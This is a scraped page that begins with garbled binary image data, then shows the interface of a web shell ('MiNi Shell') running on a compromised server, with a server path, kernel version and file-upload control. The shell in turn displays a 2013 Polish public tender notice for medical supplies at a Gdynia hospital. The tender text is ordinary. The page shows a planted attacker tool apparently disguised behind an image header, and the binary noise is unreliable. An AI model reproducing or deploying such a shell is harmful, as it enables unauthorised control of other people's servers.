JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131122/249817-N-2013.html

<p class="kh_header"><b>Gdynia: 1.	Przedmiotem niniejszego zamówienia są sukcesywne dostawy wyrobów medycznych      dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni.</b><br>
<b>Numer ogłoszenia: 249817 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Św. Wincentego a Paulo Spółka z o.o. , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 58 6207501, faks 58 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwincentego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Przedmiotem niniejszego zamówienia są sukcesywne dostawy wyrobów medycznych      dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia są sukcesywne dostawy wyrobów medycznych      dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni. 
2.	Zamawiający informuje, iż ilości asortymentu stanowiącego przedmiot zamówienia są wartościami szacunkowymi, służącymi do prawidłowego skalkulowania ceny oferty, porównania ofert i wyboru oferty najkorzystniejszej. Ilość zamawianego asortymentu, w ramach realizacji umowy może ulec zmniejszeniu lub zwiększeniu, w poszczególnych grupach asortymentowych do 25 % (słownie: dwadzieścia pięć procent), w zależności od rzeczywistych potrzeb Zamawiającego, z zastrzeżeniem, iż wartość oferty wybranego Wykonawcy nie zostanie przekroczona.
3.	Wykonawca zapewni na własny koszt dostawę do siedziby Zamawiającego, Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1.
4.	Zamawiający wymaga, aby asortyment oferowany w niniejszym postępowaniu o udzielenie zamówienia publicznego, w zakresie składanej oferty spełniał warunki i posiadał niezbędne oznakowanie, certyfikaty, deklaracje zgodności wprowadzające do obrotu i używania na terytorium państwa członkowskiego, o których mowa w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (tj. Dz. U. z 2010 r. Nr 107, poz. 679. z późn. zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)ulotki informacyjne pochodzące od producenta oferowanego asortymentu wraz z fotografią (rysunkiem), zawierające informacje niezbędne dla oceny oferowanego asortymentu, pod kątem jego zgodności z SIWZ;
2)pakiet 5 - próbki zestawu;
3)pakiet 7 poz 1 i 2 - próbki: poz.- 1 poj. opakowanie 10 cm3; poz. 2- 1 poj. opakowanie 20 cm3
4)pakiet  7 - katalog producenta oferowanego wyrobu, podanie numeru katalogowego, producenta/dystrybutora wraz z dokładnym opisem wyrobu i opisem użycia i przechowywania produktu (instrukcja, ulotka producenta);
5)pakiet 7 - Deklaracja zgodności potwierdzająca zgodność produktu z europejskimi wymaganiami bezpieczeństwa dla wyrobu medycznego z uwzględnieniem klasy do której należy oferowany wyrób.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1)	wynagrodzenia wykonawcy, 
2)	częstotliwości dostaw, miejsca dostaw,
3)	zmiany cen asortymentu wskazanego w umowie,
4)	zmiany nazwy produktu przy zachowaniu jego parametrów w sytuacji, gdy produkt zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta produkt zmodyfikowany / udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie,
5)	upadłości albo likwidacji producenta lub dystrybutora
6)	wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
2.	Zmiany, o których mowa w ust. 1 mogą być dokonane w następujących przypadkach:
1) ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe netto pozostaną bez zmian;
2)	w zakresie, o którym mowa w ust. 1 pkt. 3, w przypadku:
a)	zmian wprowadzonych przez producentów, obniżki marży;
b)	zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3)	w przypadku zmiany przepisów prawa mających wpływ na warunki umowy;
4)	jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.
3.	Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwincentego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Św. Wincentego a Paulo Sp. z o.o., ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 10:00, miejsce: Szpital Św. Wincentego a Paulo Sp. z o.o., ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw inhalacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw inhalacyjny z możliwością podłączenia do reduktora tlenowego, jednorazowego użytku:
-z nebulizatorem 15 ml,
-ustnikiem
-trójnikiem
-drenem 21 m
-do użytku z inhalatorami tłokowymi
-do użytku przez jedną osobę
-wysokiej jakości materiał
produkt LatexFree -5 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Proszek cementu szkło - jonomerowe do stosowania w otochirurgii, Płyn cementu szkło - jonomerowe do stosowania w otochirurgii, Implant szkło - jonomerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Proszek cementu szkło - jonomerowe do stosowania w otochirurgii.
Jałowy proszek zapakowany dwuwarstwowo po 2g w folię polietylenową i rękaw typu STERKING LTR 40	- 10 szt.
2.Płyn cementu szkło - jonomerowe do stosowania w otochirurgii.
Jałowy płyn- wodny roztwór kopolimeru kwasów alkenowych, zapakowany po 1 ml do ampułko- strzykawki - 10 szt.
3.Implant szkło - jonomerowe. 
Jałowy do rekonstrukcji łańcucha kostek słuchowych typ KN(20 szt.) i typ DK(20 szt.) - 40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kompletny zestaw z pojedynczym przetwornikiem do pomiaru ciśnienia metodą krwawą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompletny zestaw z pojedynczym przetwornikiem do pomiaru ciśnienia metodą krwawą, współpracujący ze stacją hemodynamiczną AXIOM SENSIS produkcji SIEMENS za pomocą pniowego kabla interfejsowego. Zestaw wyposażony w linię ciśnieniową, przetwornik ze zintegrowanym systemem z możliwością przepłukiwania - 1500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Protezy głosowe, Arkusz silikonowy do zabiegów laryngologicznych, Krążek silikonowy (obturator) do zabiegów zamknięcia ubytków i perforacji w przegrodzie nosowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Proteza głosowa - zestawy do implantacji i wymiany.Niskooporowa, wszczepialna silikonowa proteza głosowa. Posiadająca pierścień z polimeru fluorowego widocznego w promieniach rentgenowskich oraz dwa elastyczne kołnierze (od strony przełyku i od strony stomy) umożliwiające zakładanie tej samej protezy do przetoki przełykowo-gardłowej  z dojścia przedniego - przez tracheostomię albo z dojścia tylnego - od strony przełyku z użyciem giętkiej prowadnicy. Proteza winna być łatwo czyszczona za pomocą szczoteczki oraz przepłukiwana za pomocą gruszki (w celu przedłużenia żywotności).
Rozmiary protez: w przedziale od 4 do 15mm  (4, 4.5, 6, 8, 10, 12.5, 15)
Wymagania dotyczące protez:
-Proteza musi być wykonana z silikonu medycznej jakości;
-Proteza musi zapewniać maksymalny przepływ powietrza do przełyku - wymagana średnica korpusu minimum 22 French;
-Obudowa jednokierunkowej zastawki musi być widoczna w promieniach rentgenowskich;
-Opakowanie powinno zawierać szczoteczkę do czyszczenia protezy;
Opakowanie powinno zawierać instrukcje obsługi dla pacjenta i dla lekarza w języku polskim - 15 szt.
2.Proteza głosowa - zestawy do implantacji z narzędziami jednorazowego użytku do wykonania punkcji i wszczepienia protezy
Niskooporowa, wszczepialna silikonowa proteza głosowa. Posiadająca pierścień z polimeru fluorowego widocznego w promieniach rentgenowskich oraz dwa elastyczne kołnierze (od strony przełyku i od strony stomy) umożliwiające zakładanie tej samej protezy do przetoki przełykowo-gardłowej  z dojścia przedniego - przez tracheostomię albo z dojścia tylnego - od strony przełyku z użyciem giętkiej prowadnicy. 
Rozmiary protez: 8, 10, 12.5mm
Wymagania dotyczące protez:
-Proteza musi być wykonana z silikonu medycznej jakości;
-Proteza musi zapewniać maksymalny przepływ powietrza do przełyku - wymagana średnica korpusu minimum 22 French;
-Obudowa jednokierunkowej zastawki musi być widoczna w promieniach rentgenowskich;
-Opakowanie powinno zawierać:
a)Transparentny protektor gardła - zapobiegający perforacji tylnej ścianki przełyku;
b)Cienka specjalnie zagięta metalowa igła punkcyjna z kanałem wewnętrznym do przeprowadzenia prowadnika
c)Prowadnica z tworzywa sztucznego
d)Rozszerzadło z zamocowaną protezą ( gotową do aplikacji) oraz kanałem do mocowania prowadnika
Opakowanie powinno zawierać instrukcje obsługi dla pacjenta i dla lekarza w języku polskim -10 szt.
3.Arkusz silikonowy do zabiegów laryngologicznych: grubość 0,13mm; wym: 150x200mm; pakowany pojedynczo niesterylnie -1 szt.
4.Krążek silikonowy (obturator) do zabiegów zamknięcia ubytków i perforacji w przegrodzie nosowej: grubość 0,50mm; kołnierz dwustronny O 30mm; pakowany pojedynczo sterylnie - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zestaw do ablacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw do ablacji  - 72 szt.
Skład zestawu wg Zamawiającego: 
1. serweta o wymiarach  211 x 292 cm wykonana z włókniny typu SMS o gramaturze 54g/m2. Serweta posiada dwa otwory udowe o średnicy 12 cm otoczone taśmą lepną. Dookoła otworów warstwa absorbująca o gramaturze 150,6 g/m2, o wymiarach 120 x 80 cm
2. fartuch chirurgiczny wykonany z trójwarstwowej włókniny 
typu SMS o gramaturze min. 44 g/m2 rozm. L - 1szt,   
3. ręcznik chłonny 30x40cm -szt.2
4. miseczka plastikowa przezroczysta z podziałką 250ml,
5. gaziki 8 - warstwowe o wymiarach  7,5 x 7,5 cm - 40 szt.
6. strzykawka 10 ml typ luer - 1 szt., 
7. strzykawka 20 ml typ luer - 1 szt.
7. igła nr 0,8 x 40 mm - 1 szt.
8. igła angiograficzna Seldingera 1.3 x 70 mm - 1 szt.
9. pokrowiec na przewody (tubus) przezroczysty, rozmiar 
13x250cm - 2 szt.
10. Całość  owinięta w nieprzemakalną serwetę o wymiarach 152 x 190 cm o gramaturze 85 g/m2 - jako przykrycie na stolik instrumentariuszki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jednorazowy wkład (Linden Luer + rurka do napełniania) do strzykawki automatycznej Angiomat Ilumena.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowy wkład (Linden Luer + rurka do napełniania) do strzykawki automatycznej Angiomat Ilumena - 1 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Syntetyczny materiał kościo-zastepczy , Membrana do rekonstrukcji chrząstki stawowej na bazie kwasu hialuronowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Syntetyczny materiał kościo-zastepczy w granulkach przeznaczony do wypełniania ubytków kostnych w trakcie operacji z zakresu ortopedii i traumatologii. Zbudowany z czystego resorbowanego ß-trójfosforanu wapnia, biokompatybilny przyspieszający osteointegrację oraz resorbcję. Parametry: porowatość  60-80% połączonych ze sobą porów o rozmiarach 200-500 mikronów średnica granulek 2-3 mm, objętość 10 cm3-10 szt. 
2.Syntetyczny materiał kościo-zastępczy w granulkach przeznaczony do wypełniania ubytków kostnych w trakcie operacji z zakresu ortopedii i traumatologii. Zbudowany z czystego resorbowanego ß-trójfosforanu wapnia, biokompatybilny przyspieszający osteointegrację oraz resorbcję. Parametry: porowatość  60-80% połączonych ze sobą porów o rozmiarach 200-500 mikronów średnica granulek 2-3 mm, objętość 20 cm3-10 szt. 3.Membrana do rekonstrukcji chrząstki stawowej na bazie kwasu hialuronowego do leczenia ubytków chrzęstnych i chrzęstno-kostnych. Wymiary membrany 2x2 cm, grubość 2 mm, średnica włókna  10 mikronów, gramatura 120 g)m2. Elastyczna, łatwo przywierająca do powierzchni na którą zostanie nałożona, nie wymagająca dodatkowej fiksacji, prosta w aplikacji również w metodzie artroskopowej-5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com